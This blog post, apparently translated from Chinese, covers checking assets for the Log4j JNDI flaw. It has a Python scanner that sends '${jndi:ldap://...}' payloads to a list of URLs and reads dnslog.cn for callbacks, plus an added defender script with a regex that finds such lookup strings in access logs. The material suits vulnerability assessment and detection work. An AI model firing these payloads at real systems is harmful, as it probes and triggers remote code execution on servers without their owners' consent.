After twelve days of work in a row I had hoped Friday would be a bit easier, but then this vulnerability came along and a large batch of assets had to be checked. I looked at the reproduction method and wrote a script to check for it, using dnslog for the callback. It does nothing more than send the payload via POST and GET (so it can only detect sites that write all user-submitted erroneous data to the log). And then... it found nothing, so it was back to manual testing. I will revise it as I get environments to test against; readers can also modify it themselves, for example by looping over a dictionary of parameter names.
import requests
from urllib.parse import quote

# dnslog.cn: getdomain.php hands out a fresh subdomain tied to a PHPSESSID
# cookie; getrecords.php lists the DNS lookups recorded for that session.
url = "http://dnslog.cn/getdomain.php"
url1 = "http://dnslog.cn/getrecords.php"

file = input("请输入url文件保存路径:")  # e.g. "C:\\Users\\ASUS\\Desktop\\ces1.txt"
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"}

with open(file, "r") as file1:
    for i in file1.readlines():
        url3 = i.strip()
        if not url3:
            continue

        # One dnslog session (and therefore one subdomain) per target, so a
        # recorded lookup can be attributed to that target. The Session keeps
        # the PHPSESSID cookie that getrecords.php needs.
        session = requests.Session()
        session.headers.update(header)
        respone = session.get(url).content.decode("utf-8")
        data1 = "${jndi:ldap://" + respone + "/exp}"
        # Send the payload both raw and URL-encoded.
        data = [data1, quote(data1, "utf-8")]

        for data2 in data:
            try:
                requests.post(url3, data=data2, headers=header, timeout=3)
                requests.get(url3, data=data2, headers=header, timeout=3)
            except requests.RequestException:
                # Unreachable target or timeout: move on to the next payload.
                continue

        # Query the records for this session; "[]" means no lookup was seen.
        request1 = session.get(url1)
        if request1.content.decode("utf-8") != "[]":
            print(url3 + "存在漏洞")
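The script above only gets a result when the target writes the submitted string into a log that the vulnerable library processes. The defender-side counterpart is to search your own access logs for the same lookup string, in both the raw and the URL-encoded form the scanner sends. The following is an added example written for this post, not code from the original author; the log lines are constructed samples in Apache combined format, and the IP addresses and hostnames are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): a benign request,
# a raw lookup string in the User-Agent, and a URL-encoded one in the query.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
]

# "${jndi:<scheme>:" with optional whitespace, case-insensitive; the scheme
# (ldap, rmi, dns, ...) is captured for the report.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(line, rounds=2):
    """Percent-decode the line repeatedly (up to `rounds` times) until it stops changing."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line


def find_jndi_lookups(lines):
    """Return (line_number, client_ip, scheme) for every line carrying a JNDI lookup string."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI_RE.search(normalize(line))
        if m:
            client_ip = line.split(" ", 1)[0]  # first field of combined format
            hits.append((n, client_ip, m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for n, ip, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} from {ip}")
```

Run it against a real log by replacing SAMPLE_LOG with the file's lines; the decode loop is what catches the `quote()`-encoded variant the scanner sends, which a plain substring search for `${jndi:` would miss.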